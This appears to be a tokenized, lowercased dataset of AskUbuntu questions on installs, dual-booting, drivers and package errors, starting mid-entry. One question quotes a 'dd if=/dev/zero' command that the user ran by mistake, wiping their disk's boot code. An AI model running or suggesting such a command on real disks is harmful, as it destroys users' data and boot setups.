03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8039 pci-e fast ethernet controller ( rev 14 ) 08:06.0 cardbus bridge : texas instruments pcixx12 cardbus controller 08:06.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 08:06.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 08:06.3 sd host controller : texas instruments pcixx12 sda standard compliant sd
149279	how to clear search history in glogg ?	i am using glogg to scan log files , but since the installation all the searches are saved somewhere and it is getting huge and huge . using bleachbit to clean the system is n't helpful for glogg until now and everytime i make a log search the history is saved somewhere for glogg .
149280	second graphics card	i have two graphics card in my laptop . however , i am unable to activate the nvidia one . i need to use it , because the integrated intel card ca n't connect through dvi/hdmi . i have the drivers installed , however i am unable to `` select '' the nvidia card . how do i enable the second graphics card ? while running as suggested gives sudo : nvidia-xconfig : command not found trying to install nvidia-xconfig fails as there 's no such package .
149281	ubuntu 12.04 'preparing for first use ' stuck - desktop installer	right after the ubuntu installer finishes installing ubuntu , it prompts me to reboot the system . it boots up and loads the ubuntu loading screen with the dots , then it says it 's preparing for first use . but , then it froze and the dots stopped moving . it 's been like this for a good 10-15 minutes . is it still installing or did something went wrong ? system specifications : model : dell inspiron 530 mini tower . intel celeron 450 @ 2.4 ghz processor ram : 2gb ddr2 sdram intel integrated g33 family chipset graphics note : i 've also installed previous versions of ubuntu which worked flawlessly on pcs with worse specs than this . other info - i 'm attempting to install this alongside ( triple-boot ) windows 7 and windows 8 .
149282	is there a program out there that will adjust audio volume to a certain level system wide ?	is there a program out there that will adjust audio volume to a certain level system wide ? i have a htpc and its driving me nuts with different apps playing audio at different levels . xmbc plays at one volume , vlc another , and system sounds yet another ... some sounds can barely be heard , but when turning them up , other apps are deafeningly loud . is there something that can normalize the volume across everything ?
149283	install ubuntu on laptop dual with windows 7	i have installed ubuntu 12.04/ 32-bit using wubi on my laptop running dual with windows 7 desktop and it works very very well . i am now also trying to install ubuntu on another laptop already running a linux operating system only but not successful in doing so . would like to install windows 7 dual with ubuntu . at the moment it is complaining about partitions of the existing linux when trying to install windows 7 which i suppose is fair . please herewith assist in installing the ubuntu and windows 7 platforms . very much appreciated .
149286	kde4 configuration via file ?	for quite some time i 've got the following problem : on my desktop i placed a special folder view app ( see screenshot ) . i can not resize or move it in any way when the apps/ bars are in unlocked mode . i find the overall configuration a bit unhandy - is it somehow possible to configure one 's desktop in a text-based fashion ? is there some other way to `` debug '' the desktop ?
149289	how to get mysql back on ubuntu 12.04 ?	the upgrade to ubuntu 12.04 delete mysql and i need urgently to get it back . the problem is that i 'm getting an error installing it , either with apt-get or aptitude : errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.22-0ubuntu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've already tried different ways to install mysql but without success , as reported in this thread at the forum : http : //ubuntuforums.org/showthread.php ? t=1998260 i believe i should file a bug , but following the instructions i thought better to ask here first . thank you for reading .
149297	resizing images with same pixel ratio	using ubuntu 10.10 . i want to resize images keeping the same pixel ratio . currently i have images with 300*300 .now i want to crop the images but want that the ratio 300*300 be maintained . which tool/pluginsoftware can i use for ubuntu .
149298	triple boot problem with windows 7 , ubuntu 12.04 & fedora 17	i just installed fedora 17 after ubuntu 12.04 , but now i ca n't boot into any of 2 linux , i also have windows 7 installed and i can boot to it , i edited boot with easybcd . during installation of fedora 17 i used standard creating partition and used separate `` /boot '' , `` / '' , `` swap '' , `` home '' for fedora 17 , is this fixable ? or i have to reinstall 2 os ? also is possible to share one `` swap '' partition ? and i am on ubuntu live cd . thanks for any guides .
149299	requesting new packages for inclusion on the cd	there 's a process for requesting new packages be added to the archives , but i ca n't seem to find one that details how to request new packages be added to the cd . how would i go about requesting this ?
149302	ubuntu 12.04 lts installation problem	i am trying to install ubuntu 12.04 lts on my pc using wubi . however , i keep getting this error : an error occured : *error executing command > > command=c : \\system32\bcdedit.exe /set { 2708afc0-9ffa-11e1-bc51-d167219ffa25 } device partition=e : > > retval=1 > > stderr=an error has occured setting the element data . the request is not supported . > > stdout= for more information , please see the logfile : * logfile : 06-11 10:57 debug tasklist : # # finished choose_disk_sizes 06-11 10:57 debug tasklist : # # running expand_diskimage ... 06-11 10:59 debug tasklist : # # finished expand_diskimage 06-11 10:59 debug tasklist : # # running create_swap_diskimage ... 06-11 10:59 debug tasklist : # # finished create_swap_diskimage 06-11 10:59 debug tasklist : # # running modify_bootloader ... 06-11 10:59 debug tasklist : new task modify_bcd 06-11 10:59 debug tasklist : # # # running modify_bcd ... 06-11 10:59 debug windowsbackend : modify_bcd drive ( c : hd 51255.1171875 mb free ntfs ) 06-11 10:59 error tasklist : error executing command > > command=c : \windows\system32\bcdedit.exe /set { 2708afc0-9ffa-11e1-bc51-d167219ffa25 } device partition=e : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \windows\system32\bcdedit.exe /set { 2708afc0-9ffa-11e1-bc51-d167219ffa25 } device partition=e : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= 06-11 10:59 debug tasklist : # cancelling tasklist 06-11 10:59 debug tasklist : new task modify_bcd 06-11 10:59 error root : error executing command > > command=c : \windows\system32\bcdedit.exe /set { 2708afc0-9ffa-11e1-bc51-d167219ffa25 } device partition=e : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \windows\system32\bcdedit.exe /set { 2708afc0-9ffa-11e1-bc51-d167219ffa25 } device partition=e : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported . > > stdout= 06-11 10:59 debug tasklist : new task modify_bcd 06-11 10:59 debug tasklist : new task modify_bcd 06-11 10:59 debug tasklist : # # finished modify_bootloader 06-11 10:59 debug tasklist : # finished tasklist*
149304	how do i install older postgresql ( 8.4 ) in ubuntu 12.04 ?	well , it 's the whole question . i installed 9.1 before , but i need older version now and i have n't yet found out how to do that .
149309	brightness controls not working on sony vaio vgn fz31s nvidia g8600m	since i installed xubuntu 12.04 on my notebook , brightness controls are no longer working ( they used to work before with smartdimmer ) . i tried several suggestions , starting from gnome-settings with gsd-backlight-helper to the xorg.conf file , but both did n't help , maybe someone can give me further advice ?
149314	increasing disk size for ubuntu 12.04	i already have 11.10 ubuntu installed within windows ( wubi ) and has a disk size of 8gb . updating to 12.04 requires more disk size , how do i increase the disk size for succesful 12.04 installation ?
149320	battery consumption on ubuntu 12.04 installed on dell xps l501x	i encountered with the problem that ubuntu 12.04 causes my battery to consume rapidly as compared to windows . most of the time , fan is running and system heats up . kindly help me sort out where the problem is ?
149324	how do i boot directly into a user 's xterm ?	04 64bit and user called 'ubuntu' how do i boot my system into ubuntu user 's xterm without loading gnome-desktop and prompting for password ? i have tried hacking grub , but it always asks me for password , and bash profile cant load correctly , running startx xterm never loads bash , thanks in adv .
149325	no options for sound output	newbie here . trying out ubuntu for kicks . i have a 10.04 ubuntu system dual booting on my windows 7 laptop , fully updated , an asus a53s . i have an external samsung monitor/tv hooked up via hdmi . i 'm getting sound from the external monitor fine when using win7 but ca n't get anything with ubuntu . i 've read threads here about similar stuff and they say go check my sound options but i do n't have any additional options than the one listed - internal audio . what else can i check/do ?
149326	two linux os at a time	if i install ubuntu 12.04 alongside fedora 17 and if i install some applications in ubuntu and then later i login my pc with fedora will the applications will be available for me in fedora or do i have to restart my pc with ubuntu to access those applications.need help
149328	nvida x server dual monitor	i need to set up dual screen . i 've tried countless of ways but failed . right now , i have re-installed x server so everything is at it 's default . how do i switch to dual monitor with one being portrait ( and left of ) the other , the main screen ?
149329	how do we find out if the partition table recovered with testdisk is ok ?	we have a hard drive with damaged partitions . in deeper search testdisk found it but wanted to deletd all of the partition ( and showed structure ok below ) : we tried this one but then it showed the structure is bad ( below ) : another way which we thought was good is choosing all the other partition as delete , except to the last one , and to choose the important partition ( the second one ) as l and also *-bootable or p ( rimary ) : we now need to know if that is ok so that we can apply the changes . there is more information if needed in our post on the forums . it is very important to recover all of our work there .
149333	why ca n't i access my ubuntu web server or ssh from the internet ?	i am new to ubuntu server and i have installed ubuntu server on a vm and installed lamp etc but my problem is that my website is not visible outside . i have port triggering and added port 21,22 and 80. i really do n't know what am doing , i am totally lost ! i have a dynamic ip but i can access the server through 192.168.25.1 no matter how many times i restart the modem and from my public ip . i get redirected to my router settings what should i do ? ? i am able to listen to all my ports tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen tcp 0 0 0.0.0.0:993 0.0.0.0 : * listen tcp 0 0 0.0.0.0:995 0.0.0.0 : * listen tcp 0 0 192.168.25.129:22 192.168.25.1:46599 established tcp6 0 0 : ::110 : : : * listen tcp6 0 0 : ::143 : : : * listen tcp6 0 0 : ::22 : : : * listen tcp6 0 0 : ::25 : : : * listen tcp6 0 0 : ::993 : : : * listen tcp6 0 0 : ::995 : : : * listen
149337	setting eth0 paramaters in 12.04	my pc is connected to dsl modem using ethernet cable . at present i change eth0 parameters like mtu , txqueuelen using ifconfig at terminal on each boot . i would like to change some parameters of eth0 permanently.how do i do it ?
149338	black areas with default ( gray ) theme in gtk3 based applications	i use ubuntu 12.04 with the blackbox window manager and the default ( gray ) gtk theme . with some gtk 3 applications , like gedit , disk utility and evince i see black areas which should be gray and these black backgrounds make the black text on top of them impossible to read . in gedit all tabs turn black if i open a new tab after having launched the application . in disk utility all information is unreadable due to the black background in the right part of the window . in evince the top of the side pane is black . i tried the icewm window manager but the black areas showed up there as well so i conclude that the problem is unrelated to the window manager . it seems to me that very few people use the default theme as this bug ( or bugs ) has still not been fixed . is anyone else experiencing this problem ? here are my gtk settings : $ cat ~/.config/gtk-3.0/settings.ini [ settings ] gtk-theme-name = default gtk-icon-theme-name = hicolor update : after switching to lubuntu 12.04 ( still using blackbox wm ) i do n't have this problem anymore . do n't ask me why .
149341	search for duplicate prefix of file names	i have a folder contains files name as : xxx.get.txt and xxx.resp.txt xxx.get.txt , xxx.resp.txt yyy.get.txt , yyy.resp.txt zzz.get.txt , zzz.resp.txt , etc each prefix xxx should have two corresponding files , .get.txt and .resp.txt however , now i calculate the number of .get.txt and the number of .resp.txt files , they are not equal , there 're ten more .get.txt . i want to find out , which .get.txt files do not have â´.resp.txtâ´ file is it possible ? many thanks !
149345	replace broadcom `` wl '' driver with `` b43 ''	i 'm using ubuntu 10.04.4 lts , and in my laptop there is a broadcom bcm4312 wlan card . lspci output : 04:00.0 network controller : broadcom corporation bcm4312 802.11b/g ( rev 01 ) subsystem : broadcom corporation device 04b5 flags : bus master , fast devsel , latency 0 , irq 18 memory at f4500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information < ? > capabilities : [ e8 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable- capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting < ? > capabilities : [ 13c ] virtual channel < ? > capabilities : [ 160 ] device serial number 81-ac-1d-ff-ff-12-54-92 capabilities : [ 16c ] power budgeting < ? > kernel driver in use : wl kernel modules : wl , ssb so as you can see , the current ( and default ) driver is wl - installed with jockey . but i have another ubuntu based distribution on my laptop ( backtrack linux ) , which is also 10.04 , but it has the b43 driver installed and the overall performance is much better . so i would like to install it on this os too , but even google did n't help me . so my question is how to install the latest b43 driver on my ubuntu ?
149346	how to uninstall java6	i am trying root @ vz10931 : /var/www/mailer # apt-get remove -- purge sun-java6-bin reading package lists ... done building dependency tree reading state information ... done you might want to run apt-get -f install to correct these : the following packages have unmet dependencies : sun-java6-jdk : depends : sun-java6-bin ( > = 6.24-1build0.8.04.1 ) but it is not going to be installed sun-java6-jre : depends : java-common ( > = 0.24 ) but it is not installable depends : sun-java6-bin ( > = 6.24-1build0.8.04.1 ) but it is not going to be installed or ia32-sun-java6-bin ( > = 6.24-1build0.8.04.1 ) but it is not installable vim : depends : vim-common ( = 1:7.1-138+1ubuntu3.1 ) but 2:7.3.154+hg~74503f6ee649-2ubuntu3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . below is my sources.list deb http : //pl.archive.ubuntu.com/ubuntu/ hardy main restricted universe multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ hardy main restricted universe multiverse deb http : //pl.archive.ubuntu.com/ubuntu/ hardy-updates main restricted universe multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ hardy-updates main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu hardy-security main restricted universe multiverse deb-src http : //security.ubuntu.com/ubuntu hardy-security main restricted universe multiverse ubuntu version - hardy heron anyone know how to remove java ?
149352	how to resolve - dpkg error : old pre-removal script returned error exit status 102	i am unable to install or remove a package on my ubuntu 10.04 due to the following error . $ sudo apt-get autoremove password : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : busybox 0 upgraded , 0 newly installed , 1 to remove and 9 not upgraded . 1 not fully installed or removed . need to get 0b/212kb of archives . after this operation , 627kb disk space will be freed . do you want to continue [ y/n ] ? y selecting previously deselected package nscd . ( reading database ... 235651 files and directories currently installed . ) preparing to replace nscd 2.11.1-0ubuntu7.8 ( using ... /nscd_2.11.1-0ubuntu7.8_amd64.deb ) ... invoke-rc.d : not a symlink : /etc/rc2.d/s76nscd dpkg : warning : old pre-removal script returned error exit status 102 dpkg - trying script from the new package instead ... invoke-rc.d : not a symlink : /etc/rc2.d/s76nscd dpkg : error processing /var/cache/apt/archives/nscd_2.11.1-0ubuntu7.8_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 102 update-rc.d : warning : /etc/rc2.d/s76nscd is not a symbolic link invoke-rc.d : not a symlink : /etc/rc2.d/s76nscd dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 102 errors were encountered while processing : /var/cache/apt/archives/nscd_2.11.1-0ubuntu7.8_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what should i do to resolve this error ? i have tried sudo dpkg -- remove -- force-remove-reinstreq nscd but it did not work .
149355	packard bell ts11hr-068ge brightness control does n't work	i did search in google but have n't find anything about this problem for my model laptop : packard bell ts11hr-068ge the graphic card is : nvidia geforce 610m i am newbie on linux & ubuntu , so pls tell me as simply as possible how can i fix this problem 10x
149357	login screen hangs after entering password	when i enter my password in the login box nothing happens . it gets stuck . it was running fine earlier . i have installed gnome-panel and cairo-dock , after which , i logged out , logged back in , and choose gnome classic session . i also added a ppa from the webupd8.org to install the themes ( link ) . i opened ubuntu tweak tool , and changed the theme to evolve the whole laptop stopped responding . the keyboard and mouse were unresponsive . so i was forced to do a shut down . now whenever it starts , i can not login into ubuntu . i hear the fan noise , as its spinning very fast , when the laptop freezes . ( probably the cpu is running at 100 % ) . please help me . how can i login back to ubuntu ? i am using ubuntu 12.04 and have installed all the latest updates.. edit : i want to know how can i delete a folder from the file system using the live cd ?
149360	installing ubuntu 12.04 on a high-resolution display laptop	i have installed ubuntu 12.04 with compiz on a 17 '' laptop with 1920x1080 display . after the installation the fonts are too small . even if i change the fonts ' size the close/minimize/mazimize icons remain tiny , is tehre any appropriate theme for high-resolution displays ? how can i install it ?
149381	how to install ubuntu 12.04 without physical address extension ?	physical extension memory is required in my computer to install ubuntu 12.04 in my laptop . i do n't know how pae is upgraded in laptop . is there any other solution to install ubuntu 12.04 ?
149398	why does n't id-tool show latest added group ?	i wanted to add myself to a group called vboxusers while the following situation occured : at first let 's see how it looks before we do anything : $ id uid=1001 ( me ) gid=1001 ( me ) groups=1001 ( me ) ,4 ( adm ) ,27 ( sudo ) ,109 ( lpadmin ) ,124 ( sambashare ) $ cat /etc/group | grep me adm : x:4 : me sudo : x:27 : me lpadmin : x:109 : me me : x:1001 : then i added myself to the group and checked again : $ sudo usermod -ag vboxusers me $ id uid=1001 ( me ) gid=1001 ( me ) groups=1001 ( me ) ,4 ( adm ) ,27 ( sudo ) ,109 ( lpadmin ) ,124 ( sambashare ) $ cat /etc/group | grep me adm : x:4 : me sudo : x:27 : me lpadmin : x:109 : me me : x:1001 : vboxusers : x:126 : me id still does n't list me as being part of the group , while i definitely wrote the correct stuff into /etc/groups . what happened and what can i do that id also recognises it ? ( just starting a new shell did n't change anything )
149402	when typing , mouse stops moving	i did a clean installation of ubuntu 12.04 recently and all is well , except for one small thing . when i type anything and anywhere with the keyboard , i cant move the mouse . so for example when i am playing a game which requires two hands like nexuiz , i can only move the character but i can not turn around simultaneously . ubuntu runs on a desktop pc . i have a standard cheap logitech keyboard and the most common microsoft mouse . i tried connecting the keyboard or the mouse , or both together on the ps/2 hub but it 's still the same . any suggestions considering the solution of this problem are welcome . also note that i have already tried the 'disable touch while typing ' from dconf-tools with no result . thanks in advance to anyone who replies .
149408	ca n't select anything on grub and it just boots to the first option , what could be the problem ?	i 'm using a usb keyboard but it was n't like this right after i installed 12.04x64 one detail though : right after i installed the amd radeon drivers both the grub screen and ubuntu 's boot sequence looked different , specially the ubuntu screen which now seems lowdef and stretched . update : uninstalling the drivers seemed to have fixed this , but now i do n't know how it will affect the performance of my system . update 2 : the problem is back , and now flash video stops after a few seconds ( do n't know if related but since it started at the same time ... )
149409	installation does n't start	i wanted to try out ubuntu on my desktop pc . i downloaded ubuntu 12.04 64 bit version and burned it on a cd . when boot the cd and got those option to chose if i want to install ubuntu or run it from the cd . i chose to install ubuntu . when i press enter it 's going to load and you 'll see a `` - '' sign in the top left corner of my screen . after that nothing happends . edit i may not answer my own questions so i 'll edit this one but i tried to run the installation with acpi=off and now the installation starts . if its still needed my graphic card is gtx550 ti and my processor is q8400 @ 2.66 ghz
149411	iwconfig usage for wep access point ?	i would like to use my wifi doggle in my pc ( ubuntu 12.04 ) . i am able to connect to my access point through the gui . i would like to do the same in the terminal . my access point uses wep . so i typed the following commands iwconfig wlan0 mode managed key 6d6f6e6579 iwconfig wlan0 essid `` accesspoint '' dhclient wlan0 after typing dhclient wlan0 it waits like 1-2 min then outputs nothing and can not connect to the access point . iwconfig output : wlan0 ieee 802.11bgn essid : '' accesspoint '' mode : managed access point : not-associated tx-power=20 dbm retry long timit:7 rts thr=2347 b fragment thr : off encryption key:6d6f-6e65-79 power management : off i would appreciate any suggestion
149412	simple scan is missing in 12.04	i was wondering if there is a way to add 'simple scan ' back under 'attached devices ' in session indicator on ubuntu 12.04 as it was in 11.10 ? i would appreciate it as it was a quick and easy way to access the simple scan application . thank you very much ! derrick
149419	boot fail - asus eee pc	i installed ubuntu 12.04 as my main operating system on my asus eee pc 1005ha machine . when i restarted the pc , the boot loader did n't come up . i got only a black screen . during the installation process , a grub error asking to setup the initialization partition . i choose sda1 and continued , and then a got the no grub screen after restarting . i reinstall again , ( this time there was no error massage ) but i still ca n't see the grub screen . is there a special config to install ubuntu on asus netbook ? it 's to possible to fix my grub from the usb live cd ?
149420	'the folder could not be opened ' lubuntu 12.04 64-bit error	i am getting a error window stating launch error while trying to open other partition ( ntfs , ext4 ) from desktop with description as follows . did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . my network connection is working properly and it is couple of days fresh installation alongside ubuntu 12.04 also posting a screen shot , though not a major problem but now i am getting it quite often . p.s : i am guessing it is mostly related to file manager [ thunar 1.2.3 ]
149422	synaptic package manager and update manager are not working	this is the message i get for both of them e : malformed line 58 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report .
149428	why does parallels 7 have such poor support for ubuntu 12.04 ?	i have just tried out parallels 7 for running ubuntu 12.04 lts , and encountered a few problems . these are : unrecognized platform the first problem i have encountered is that parallels 7 does not recognize ubuntu 12.04 lts server ( 64 bit ) or ubuntu 12.04 lts desktop ( 64 & 32 bit ) . i have to manually select `` ubuntu '' from the list of platforms . no fast-track installation i also noticed that there is no `` fast-track '' installation of ubuntu that bypasses all the installation screens . this may be a bug because the ubuntu version is unrecognized , or perhaps strictly want of a feature . however , i had expected there to be feature-parity with vmware fusion 4 . no parallels tools installed none of the tools for parallels were installed automatically ( which is kind of expected given the lack of platform support ) . it was not apparent where they go or how to run them from the installation . when i run virtual machine - > install parallel tools ... nothing seems to be mounted in the vm - /dev/fd0 returns `` is not a valid block device '' and there is no /dev/cdrom or equivalent in fstab ; it was not apparent how to mount the install tools . parallels indicates that it is mounted as device sata 0:2 , but i do not know offhand how to go about tracking this down in /dev . no bridged networking for no apparent reason bridged networking does not work at all . a google search indicated that this was a known problem . all of the above may stem from the first issue : lack of platform support . perhaps these are individual and discrete issues . nevertheless , i encountered them all within minutes of downloading and installing parallels 7 , so i though to raise them here to see if they have been addressed . as some context , i was a vmware 3 user that clicked on the free trial of vmware 4 . since vmware 4 did not seem to offer any particular benefits over vmware 3 i wanted to `` downgrade '' back to my licensed version of vmware 3- but this proved to be problematic . as a result , i wanted to give parallels a try . at first glance , parallels 7 seems to be snappier than vmware and seems to use fewer resources , however the above issues make it appear to be less polished . that 's my 2รง contribution to the glut of vmware v parallels comparisons . : ) any thoughts on the above issues would be greatly appreciated . thanks for reading !
149431	problem with a dna sequencer	i have recently obtained the minion usb genome ( dna ) sequencer , which to my disappointment does n't seem to be working in ubuntu properly . i 'm using the 12.04 release of ubuntu . the sequencer is properly detected by the script/driver that comes with it , but seems to be unable to detect the sample . i 'm attaching the screenshot of the process . any help would be greatly appreciated !
149436	should i upgrade from 11.04 to 12.04 directly or upgrade to 11.10 first	upgrade manager is talking about doing upgrade 11.10 can ( and should ) i go straight to 12.04 ? if so how ( online ? ) ? yup , i 've backed up my data ! : ) i 've looked at a lot of similar questions about 10 and 11 upgrades but none of them are quite the same as my question using the specific versions i 've shown . this question : how can i upgrade from 11.04 to 12.04 ? seems to iondicate that i 'll need to do the upgrade to 11.10 first . this : can i skip over releases ? also seems to prefer that . btw this is one of three systems . i tend to upgrade one system and the other two i do fresh installs as that 's certainly a good option every year or two and gives great life span to older machines .
149443	ubuntu hangs on booting up after a update	i 've made a clean install yesterday , for the first time restarted , everything went good and then after i updated packages and copied my old home directory to replace the new one , when i restarted it hung when it was booting . i tried reinstalling again and doing the same thing , but again same thing happened . here 's what i see , before when the ubuntu logo with the five dots is shown : then after that , 3 or 4 of the dots will load and hangs there . if i press arrow up before that , this will be shown i started my laptop again today ( the pictures are for the day before ) and after that , boot up with live cd and got the logs . dmesg : http : //pastebin.com/avxv7bqf syslog : http : //pastebin.com/4e2brruk and some info : alfred @ alfitop : ~ $ uname -a linux alfitop 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 x86_64 x86_64 gnu/linux lshw : http : //pastebin.com/azbkjmst sources.list : http : //pastebin.com/2hazmuyv my problem is a bit similar to here : http : //ubuntuforums.org/showthread.php ? t=1918271 though i did n't change my x.org config . only changed home directory and updated packages . i 've tried memtest and fschk , both passed . in the recovery mode boot option , i 've also realized that same things happen in failsafe graphical mode . but when i go into the network mode , i can boot up my system , but of course same the graphics are just basic . adding blacklist intel_ips to /etc/modprobe.d/blacklist.conf solves the first message , but still i get the broken pipe and cpu stack traces . the current kernel version is 3.2.0-25 , i 've tried booting up in the 3.2.0-23 ( the one the installer came with , but same results . ) also uninstalled apparmor , did n't help . i 've installed ubuntu again , this time without copying the home directory , also same result . -- - update -- - this problem was solved before with removing backports , but its back again ! i 've updated my laptop last night and the problem came back . it 's definitely one of these packages . my /var/log/apt/term.log and /var/log/apt/history.log . i 'm almost having the same situation . -- - update -- - i realized this also have happened on times that i have updated ( have n't restarted after it ) and my computer power has been cut off and its shutdown due to lack of power . and i realized if i just do as i answered but not in somewhere without gui ( networking mode has the gui ) it would n't work .
149447	how can i save my `` customized active input method '' after os reboot in ibus ?	in ubuntu 12.04 , using ibus 1.4.1 , each time i add input methods into ibus in ibus preferences - > input method ( i have to tick `` customize active input methods '' to edit the list ) , the list gets cleared after i reboot and logged in again . how can i save the input methods list i made so it does n't get cleared after reboot ?
149448	why is disk utility ( palimpsest ) the default and not gparted ?	gparted seems to be the more robust and feature-rich application of the two , is there a reason as to why gparted is not installed by default in ubuntu ?
149453	problem booting windows after failed installation of 12.04 alongside windows 7	i tried to install in my laptop 12.04 so that i can dual-boot with windows 7 . i made some mistakes during this process and i did n't manage to install ubuntu . but my real problem now is that i 'm afraid that i also destroyed the installation of windows 7 . your help would be precious for me . here are the details of what i did : 1 . ) i followed these instructions to dual boot ubuntu 12.04 and windows 7 . the only difference from what is described above , is that in my case the device names where : /dev/mapper/isw_fdjdhbadc_volume0* instead of /dev/sda* note that i had created a bootable usb stick to do that . 2 . ) the installation proceeded normally , but in the end i got a fatal error because the grub-install failed . 3 . ) then , after googling this problem , i run ubuntu from the usb stick and run this command : sudo grub-install -- root-directory=/home/ubuntu/temp /dev/mapper/isw_fdjdhbadc_volume0p5 ( /isw_fdjdhbadc_volume0p5 was the partition that i had made for /boot ) but this command also failed . 4 . ) then , i did something stupid ( i think ) : i run the above command as : sudo grub-install -- root-directory=/home/ubuntu/temp /dev/mapper/isw_fdjdhbadc_volume0 namely i tried to install grub in the device isw_fdjdhbadc_volume0 instead of the boot partition isw_fdjdhbadc_volume0p5 the above command did not fail and was executed ok . 5 . ) after that , i tried to boot my laptop , but it seemed that i had no operation system . not even windows were detected . 6 . ) i thought that i should uninstall grub from isw_fdjdhbadc_volume0 . so following some online instructions that i found , i booted again ubuntu from the usb stick and run the following command ( this was stupid since the instructions were for a totally different case than mine ) : sudo dd if=/dev/zero of=/dev/mapper/isw_fdjdhbadc_volume0 bs=446 count=1 afte that , i was still unable to boot windows . i realize that i deleted something that i should n't , but i 'm hope that this is not crucial and i can recover somehow . when i boot ubuntu from the usb , i can see that the partition with windows is still there , with all the directories , windows files , my data etc . so , my question is : is there a way to undo the mistakes that i described above and recover windows 7 ? this is my major question . after solving that , i 'd also like to know what i did wrong with the installation of ubuntu .
149454	upgrade from 11.04 to 11.10 , getting `` w : failed to fetch gzip ... ''	error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_oneiric_universe_i18n_translation-en encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead . i can browse web sites normally during this time though ( my network is ok ) .
149458	how to setup an encrypted voip structure ?	what is the simplest way to set up a voip structure in a linux machine with the following features : 1 ) using free software 2 ) for computer-to-computer calls : end-to-end encryption set by the users , unpaid , no central authority ( so skype is out ) 3 ) for computer-to-phone calls : paid or unpaid , desirable encryption on the computer side if that is even possible 4 ) ability to have a number to receive calls from regular phones my research concluded that the sip protocol is the most popular . however most discussions i 've read on sip are too technical and i felt it discourages the regular user who wants to just click and talk . so i put the question above and created some separate questions about privacy with sip registrars , privacy with voip suppliers , what to look for in a sip registrar , what to look for in a voip provider . as for the software , i noticed most software either do n't provide encryption ( eg ekiga ) or the software does n't work nicely and the project is abandoned ( eg twinkle ) , so no option seemed satisfying .
149459	i have installed ubuntu 12.04 , now my windows vista does n't boot	i have a windows vista computer . and i 've installed ubuntu 12.04 on it . but now , when i boot my device it does n't ask me which os i want to choose , instead it just boots in ubuntu . please help me ! i do n't know what to do ... : / p.s . : i 've created a partition with the ubuntu installer . my hard disk drive is 250 gb ( there around ) and the partition is 30gb big ... p.s.s . : it 's very important because is my mom 's computer and there are some very important files on it ... : (
149463	font corruption ubuntu 12.04 mirosoft office 2007 / google earth & adobe	when using ms office 2007 applications i get lines going through text fields on excel spreadsheets and also when i open or save any ms office document . i am using crossover to run office but i 'm also using ttf-mscorefonts for adobe and google earth . it appears that sense i upgraded to 12.04 from 11.10 the ms fonts clash . because if i purge ttf all is ok on ms office but then adobe and google are unreadable any ideas ? thanks sean
149471	filezilla install problem : hash sum mismatch	i 'm new to the ubuntu scene , and i tried to install filezilla today by going to terminal and typing `` sudo apt-get install filezilla '' , and got this error : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/w/wxwidgets2.8/libwxbase2.8-0_2.8.12.1-6ubuntu2_amd64.deb hash sum mismatch failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/w/wxwidgets2.8/libwxgtk2.8-0_2.8.12.1-6ubuntu2_amd64.deb hash sum mismatch failed to fetch http : //universe/t/tinyxml/libtinyxml2.6.2_2.6.2-1build1_amd64.deb hash sum mismatch failed to fetch http : //universe/f/filezilla/filezilla-common_3.5.3-1ubuntu2_all.deb hash sum mismatch failed to fetch http : //universe/f/filezilla/filezilla_3.5.3-1ubuntu2_amd64.deb hash sum mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? running it again with `` -- fix-missing '' appended to the command did n't work , nor did running apt-get update . any suggestion ? thanks !
